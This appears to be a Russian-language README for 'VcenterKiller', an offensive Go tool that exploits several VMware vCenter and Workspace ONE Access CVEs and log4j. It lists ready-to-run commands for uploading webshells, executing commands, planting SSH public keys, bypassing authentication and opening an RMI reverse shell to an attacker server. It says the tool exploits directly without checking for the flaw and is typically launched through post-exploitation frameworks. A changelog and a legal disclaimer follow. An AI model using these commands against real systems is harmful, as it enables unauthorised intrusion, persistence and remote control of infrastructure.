Инструмент для комплексной эксплуатации уязвимостей Vcenter, включающий наиболее актуальные CVE-2021-21972, CVE-2021-21985, CVE-2021-22005, а также CVE-2022-22954, CVE-2022-22972/31656 для One Access и log4j. Предоставляет возможность одним нажатием загрузить веб-шелл, выполнить команды или загрузить открытый ключ для подключения по SSH без пароля.
Если вы собираете локальную среду для эксплуатации уязвимостей с помощью vckiller для проверки log4j, в большинстве случаев это не сработает, поскольку в среде VMware с сетевым режимом NAT исходящий сетевой интерфейс модуля проверки будет определяться как 127.0.0.1, и целевой адрес LDAP-сервера станет 127.0.0.1, проверка не удастся 😏
Если вы столкнулись с багами, отправьте issue. Этот инструмент создан исключительно для удобства, в нём нет ничего сверхсложного.
Комплексный инструмент проверки для Vcenter, включающий наиболее популярные CVE-2021-21972, CVE-2021-21985 и CVE-2021-22005. Предоставляет функции однокнопочной загрузки веб-шелла, выполнения команд или загрузки открытого ключа для подключения по SSH, а также обнаружение и эксплуатацию уязвимости Apache Log4j CVE-2021-44228 на Vcenter, включая выполнение команд с получением ответа (требуется вредоносный LDAP-сервер). Теперь не нужно запускать отдельный LDAP-сервер — на основе инструмента jndi-injection я вручную собрал способ эксплуатации. Vcenter использует Tomcat в качестве промежуточного ПО, поэтому достаточно использовать цепочку TomcatBypass.
Обычно Vcenter находится во внутренней сети, а признаки уязвимостей широко известны — такие инструменты, как fscan, легко их обнаруживают. VcenterKiller не предназначен для проверки наличия уязвимости, он сразу пытается её эксплуатировать. Обычно запускается через CS/MSF на шлюзовом сервере, поэтому все лишние выводы удалены.
Почему Go? Потому что на Python писать удобно, но использовать проблематично: множество зависимостей, большой размер скомпилированного файла. На C# не сделать кроссплатформенность — я бросил на полпути.
go build -o main.exe
./main.exe -u https://192.168.1.1 -m 21985 -c whoami
./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh // Передача открытого ключа
./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
./main.exe -u https://192.168.1.1 -m log4center -t scan // Сканирование log4j
./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami // Можно не указывать LDAP-сервер
./main.exe -u https://xx.xx.com -m 22954 whoami
./main.exe -u https://xx.xx.com -m 22972 // Получение cookie
./main.exe -u https://xx.xx.com -m 31656 // Если CVE-2022-22972 не работает, используйте CVE-2022-31656
Данный инструмент предназначен исключительно для легитимных проверок безопасности в организациях, например для внутренних красно-синих учений, верификации уязвимостей и повторного тестирования. Если вы хотите проверить работоспособность инструмента, создайте собственную тестовую среду.
При использовании этого инструмента для проверки вы должны убедиться, что ваши действия соответствуют местным законам и нормативным актам, а также что у вас есть соответствующие разрешения. Не используйте инструмент против неавторизованных целей.
Если в процессе использования инструмента вы совершаете незаконные действия, вы несёте полную ответственность за последствия. Мы не несём никакой юридической или иной ответственности.
V1.0 Релиз
V1.1 Для CVE-2021-21985 добавлена функция обратного шелла через RMI. Требуется запуск RMI-сервера, например jndi-injection-exploit
V1.2 Добавлена возможность обнаружения и проверки log4j на Vcenter
V1.3 Добавлена проверка уязвимостей Vmware Workspace ONE Access: CVE-2022-22954 удалённое выполнение команд; CVE-2022-22972, CVE-2022-31656 обход аутентификации
V1.3.1 Исправлена проблема игнорирования порта при обнаружении log4j — некоторые службы меняют порт 443 по умолчанию
V1.3.2 Изменён способ эксплуатации log4j: выполнение команд с получением ответа через tomcatbypassEcho. Протестировано на Vcenter 7.0 Linux.
V1.3.3 Добавлена дифференциация эксплуатации для версий 6.7 и 7.0: для 7.0 обязательно использовать tomcatbypass, для 6.7 достаточно обычного basic
v1.3.4 Изменена логика проверки log4j: сейчас 5 раз подряд отправляются разные пэйлоады — если есть ответ, значит уязвимость есть
v1.3.5 Устранена зависимость log4j от Jndi-Injection-Exploit: теперь можно напрямую выполнять команды и получать ответ
v1.3.6 Изменена функция SSH для 21972, оптимизированы прочие детали
v1.3.7 Добавлена поддержка прокси: http и socks
v1.3.8 Ещё не начато, рассматривается добавление функций...
...